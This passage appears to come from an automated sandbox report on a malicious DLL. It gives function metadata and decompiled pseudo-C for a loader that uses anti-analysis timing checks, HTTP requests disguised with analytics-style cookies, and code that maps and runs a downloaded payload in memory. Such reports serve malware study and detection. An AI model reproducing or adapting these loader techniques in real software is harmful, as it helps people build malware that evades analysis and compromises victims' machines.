      0x7ffa65c53977
      0x7ffa65c5397b
      0x7ffa65c53980
      0x7ffa65c53985
      0x7ffa65c53988
      0x7ffa65c5398e
      0x7ffa65c53995
      0x7ffa65c5399b
      0x7ffa65c5399d
      0x7ffa65c539a2
      0x7ffa65c539a6
      0x7ffa65c539aa
      0x7ffa65c539b2
      0x7ffa65c539b4
      0x7ffa65c539be
      0x7ffa65c539c1
      0x7ffa65c539c6
      0x7ffa65c539ca

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 7b9e8d97665da511a8bf5de6eed225a773ea96b32157c8bba84cb86c8fe4244b
      • Instruction ID: e879d57eb30cff458aecad0b2afacb50aaaf478de57b046397ee4c838feff8b5
      • Opcode Fuzzy Hash: 7b9e8d97665da511a8bf5de6eed225a773ea96b32157c8bba84cb86c8fe4244b
      • Instruction Fuzzy Hash: B621A623D1C581CAE7A08FE8E44437A6291EB82F02F988035E78E476D5DE1CE8549B10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000000018000244C Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 436 18000244c-180002453 437 180002474-18000247d 436->437 438 180002455-18000246e CreateThread 436->438 438->437
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
      • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
      • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
      • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 0000000180002AC0 Relevance: 3.0, APIs: 2, Instructions: 47threadCOMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E00000001180002AC0(void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
				signed int _t18;
				intOrPtr _t20;
				intOrPtr _t22;
				signed long long _t42;
				long long _t52;
				void* _t55;
				void* _t56;

				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t52;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				_t56 = _t55 - 0x30;
				SwitchToThread();
				asm("rdtsc");
				_t42 = __rdx << 0x20;
				asm("cpuid");
				 *((intOrPtr*)(_t56 + 0x20)) = 1;
				 *((intOrPtr*)(_t56 + 0x24)) = _t20;
				 *((intOrPtr*)(_t56 + 0x28)) = 0;
				 *((intOrPtr*)(_t56 + 0x2c)) = _t22;
				asm("rdtsc");
				_t43 = _t42 << 0x20;
				_t18 = SwitchToThread();
				asm("rdtsc");
				asm("rdtsc");
				if (__eflags != 0) goto 0x80002adb;
				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
			}










      0x180002ac0
      0x180002ac5
      0x180002aca
      0x180002ad0
      0x180002adb
      0x180002ae1
      0x180002ae3
      0x180002af4
      0x180002af6
      0x180002afa
      0x180002afe
      0x180002b02
      0x180002b06
      0x180002b08
      0x180002b15
      0x180002b1b
      0x180002b28
      0x180002b3b
      0x180002b59

      APIs
      • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
      • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: SwitchThread
      • String ID:
      • API String ID: 115865932-0
      • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
      • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
      • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
      • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001904 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 74libraryloaderCOMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$AddressLibraryLoadProc
      • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
      • API String ID: 1873754389-181482773
      • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
      • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
      • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
      • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001F2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55stringCOMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: lstrcpy$lstrcat$FolderPath
      • String ID: c:\ProgramData\
      • API String ID: 2440492483-4167965204
      • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
      • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
      • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
      • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001688 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50stringCOMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
      • String ID: c:\ProgramData\
      • API String ID: 1583731639-4167965204
      • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
      • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
      • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
      • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00000001800027B4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf
      • String ID: %s%u$; _ga=
      • API String ID: 2111968516-3272795577
      • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
      • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
      • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
      • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001D80 Relevance: 9.1, APIs: 6, Instructions: 62memorysleepCOMMON
      Download Yara Rule
      C-Code - Quality: 42%
      			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				char _v136;
				void* __rdi;
				void* _t12;
				char* _t37;
				intOrPtr* _t51;
				void* _t66;

				_t66 = __r11;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t51 = __r8;
				wsprintfW(??, ??);
				_t12 = E00000001180001B08(__rbx,  &_v136, __rdx, __rdx, __r8, __r9);
				_t37 =  *_t51;
				if (_t12 == 0x194) goto 0x80001e2e;
				if (_t12 != 0xc8) goto 0x80001e01;
				if (_t37 == 0) goto 0x80001e1a;
				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
				if ( *_t37 != 0x1f) goto 0x80001e01;
				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
				if (_t37 == 0) goto 0x80001e1a;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				Sleep(??);
				goto 0x80001db5;
				goto 0x80001e49;
				if (_t37 == 0) goto 0x80001e47;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0;
			}










      0x180001d80
      0x180001d80
      0x180001d85
      0x180001d8a
      0x180001d97
      0x180001daf
      0x180001dc3
      0x180001dc8
      0x180001dd0
      0x180001dd7
      0x180001ddc
      0x180001de5
      0x180001dea
      0x180001df0
      0x180001dff
      0x180001e04
      0x180001e06
      0x180001e14
      0x180001e1f
      0x180001e25
      0x180001e2c
      0x180001e31
      0x180001e33
      0x180001e41
      0x180001e61

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess$Sleepwsprintf
      • String ID:
      • API String ID: 2048420019-0
      • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
      • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
      • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
      • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001B5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E00000001180001B5C(void* __edi, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _t8;
				void* _t11;
				void* _t15;
				void* _t32;

				_a8 = __rbx;
				_a16 = __rsi;
				GetProcessHeap();
				r8d = 0x2001;
				_t8 = HeapAlloc(??, ??, ??);
				if (__rax == 0) goto 0x80001bc2;
				E000000011800014B4(_t8, _t15, __rax, __rax, L"Cookie: _s=", __rcx, _t32, __rcx);
				r9d = _t11;
				return wsprintfW(??, ??);
			}







      0x180001b5c
      0x180001b61
      0x180001b70
      0x180001b7b
      0x180001b84
      0x180001b90
      0x180001b9f
      0x180001ba4
      0x180001bd1

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AllocFreewsprintf
      • String ID: %s%u$Cookie: _s=
      • API String ID: 4121094037-887366058
      • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
      • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
      • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
      • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180002B5C Relevance: 7.6, APIs: 5, Instructions: 87memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 41%
      			E00000001180002B5C(void* __ebx, signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
				void* __rdi;
				signed int _t43;
				intOrPtr _t55;
				void* _t57;
				void* _t62;
				signed long long _t64;
				void* _t67;
				void* _t69;
				signed long long _t70;
				void* _t79;
				signed int _t81;
				void* _t84;
				intOrPtr* _t90;

				_t69 = __rcx;
				_t64 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t84 = __rdx;
				_t67 = __rcx;
				r8d = 0x3000;
				_t5 = _t69 + 4; // 0x4
				r9d = _t5;
				VirtualAlloc(??, ??, ??, ??);
				_t81 = __rax;
				if (__rax != 0) goto 0x80002baa;
				GetLastError();
				goto 0x80002c72;
				_t55 =  *((intOrPtr*)(__rcx + 0x1c));
				if (_t55 <= 0) goto 0x80002bf1;
				_t70 = __rax * 0x11;
				r8d =  *(_t70 + __rcx + 0x28);
				r10d =  *((intOrPtr*)(_t70 + __rcx + 0x20));
				_t90 = __r8 + __rcx;
				r9d =  *((intOrPtr*)(_t70 + __rcx + 0x2c));
				if (_t55 == 0) goto 0x80002bea;
				if (_t90 == 0) goto 0x80002bea;
				_t57 = __r9;
				if (_t57 == 0) goto 0x80002bea;
				 *((char*)(__r10 + __rax)) =  *_t90;
				if (_t57 != 0) goto 0x80002bd8;
				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
				if (E00000001180001A3C(__ebx, 0, 1 -  *((intOrPtr*)(__rcx + 0x1c)), __rcx, __rax, __rcx, _t79, __rax) != 0) goto 0x80002c07;
				goto 0x80002c72;
				if (E00000001180001E64(0, __rcx, _t81, __rcx, _t79, _t81, _t84) != 0) goto 0x80002c28;
				GetLastError();
				goto 0x80002c72;
				if ( *((intOrPtr*)(_t67 + 0x1c)) <= 0) goto 0x80002c56;
				r8d =  *(_t64 * 0x11 + _t67 + 0x30) & 0x000000ff;
				VirtualProtect(??, ??, ??, ??);
				_t62 = 1 -  *((intOrPtr*)(_t67 + 0x1c));
				if (_t62 < 0) goto 0x80002c2d;
				if (_t62 == 0) goto 0x80002c72;
				 *((long long*)(_t64 + _t81))();
				_t43 = GetLastError();
				asm("bts eax, 0x1b");
				return _t43 & 0x00ffffff;
			}
















      0x180002b5c
      0x180002b5c
      0x180002b5c
      0x180002b61
      0x180002b66
      0x180002b70
      0x180002b73
      0x180002b79
      0x180002b81
      0x180002b81
      0x180002b85
      0x180002b8d
      0x180002b93
      0x180002b95
      0x180002ba5
      0x180002bac
      0x180002baf
      0x180002bb3
      0x180002bb7
      0x180002bbc
      0x180002bc1
      0x180002bc4
      0x180002bcc
      0x180002bd1
      0x180002bd3
      0x180002bd6
      0x180002bde
      0x180002be8
      0x180002bef
      0x180002bfe
      0x180002c05
      0x180002c14
      0x180002c16
      0x180002c26
      0x180002c2b
      0x180002c38
      0x180002c49
      0x180002c51
      0x180002c54
      0x180002c5c
      0x180002c61
      0x180002c63
      0x180002c6e
      0x180002c86

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: AllocErrorLastVirtual
      • String ID:
      • API String ID: 497505419-0
      • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
      • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
      • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
      • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00000001800014B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 30%
      			E000000011800014B4(void* __eax, void* __ebp, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				signed int _t19;
				unsigned long long _t42;
				signed long long _t46;
				void* _t50;
				intOrPtr* _t55;
				void* _t59;
				char* _t67;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t19 =  *__rdx & 0x0000ffff;
				_t59 = __rcx;
				if (_t19 == 0) goto 0x800014f1;
				 *(__rcx - __rdx + __rdx) = _t19;
				_t46 = __rbx + 1;
				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
				_t50 = __r8;
				E00000001180001604(_t42, _t46, __r8, __rcx);
				_t55 =  !=  ? _t42 : "error";
				if ( *_t55 == 0) goto 0x80001543;
				_t67 = "0123456789ABCDEF";
				 *((short*)(_t59 + _t46 * 2)) =  *((char*)((_t42 >> 4) + _t67));
				 *((short*)(_t59 + 2 + _t46 * 2)) =  *((char*)(_t50 + _t67));
				if ( *((intOrPtr*)(_t55 + 1)) != 0) goto 0x80001517;
				 *((short*)(_t59 + (_t46 + 2) * 2)) = 0;
				if (_t42 == 0) goto 0x80001560;
				GetProcessHeap();
				return HeapFree(??, ??, ??);
			}










      0x1800014b4
      0x1800014b9
      0x1800014be
      0x1800014c8
      0x1800014cd
      0x1800014d5
      0x1800014dd
      0x1800014e2
      0x1800014ef
      0x1800014f1
      0x1800014f4
      0x180001506
      0x18000150e
      0x180001510
      0x18000152b
      0x180001534
      0x180001541
      0x180001543
      0x18000154a
      0x18000154c
      0x180001577

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess
      • String ID: 0123456789ABCDEF$error
      • API String ID: 3859560861-2801526254
      • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
      • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
      • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
      • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001604 Relevance: 6.0, APIs: 4, Instructions: 34memorystringCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
      • String ID:
      • API String ID: 1639946962-0
      • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
      • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
      • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
      • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001760 Relevance: 5.1, APIs: 4, Instructions: 121memoryCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AllocFree
      • String ID:
      • API String ID: 756756679-0
      • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
      • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
      • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
      • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180002268 Relevance: 5.1, APIs: 4, Instructions: 117memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 27%
      			E00000001180002268(void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
				char _v872;
				signed int _v904;
				signed int _v912;
				long long _v920;
				long long _v928;
				long long _v936;
				void* __rbp;
				void* _t100;
				long long _t103;
				intOrPtr _t108;
				void* _t111;
				signed long long _t114;
				long long _t117;
				long long _t118;
				signed int _t119;
				signed long long _t120;
				long long _t123;
				intOrPtr _t124;
				void* _t127;
				void* _t130;
				void* _t131;
				signed long long _t134;

				_t114 = __rdx;
				_t100 = _t130;
				 *((long long*)(_t100 + 8)) = __rbx;
				 *((long long*)(_t100 + 0x10)) = __rsi;
				 *((long long*)(_t100 + 0x18)) = __rdi;
				 *((long long*)(_t100 + 0x20)) = __r14;
				_t131 = _t130 - 0x3c0;
				r14d =  *((intOrPtr*)(__rcx + 2));
				_t123 = __rcx + 0x2c6;
				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t123, _t100 - 0x2c8, __r8,  &_v872);
				_v912 = _v912 & 0x00000000;
				_t117 = __r14 - 0x10;
				_t111 = _t117 + _t123;
				_v936 = _t123;
				_v920 = _t117;
				_v928 = _t123;
				if (_t111 == 0) goto 0x800022e4;
				asm("movups xmm0, [ecx]");
				_t103 = _t111 - __r14 - _t123;
				asm("movups [esp+eax+0x50], xmm0");
				_t118 = _v920;
				_t124 = _v936;
				r10d = 0;
				if (_t124 == 0) goto 0x800023f3;
				if (_t118 - 4 < 0) goto 0x800023f3;
				_t119 = _t118 + 0xfffffffc;
				_v920 = _t119;
				if (_v928 != 0) goto 0x8000233e;
				if (_t119 == 0) goto 0x800023f3;
				GetProcessHeap();
				_t134 = _t119 + 1;
				HeapAlloc(_t127, ??);
				_v928 = _t103;
				if (_t103 == 0) goto 0x800023f3;
				r10d = 1;
				r9d =  *(_t119 + _t124);
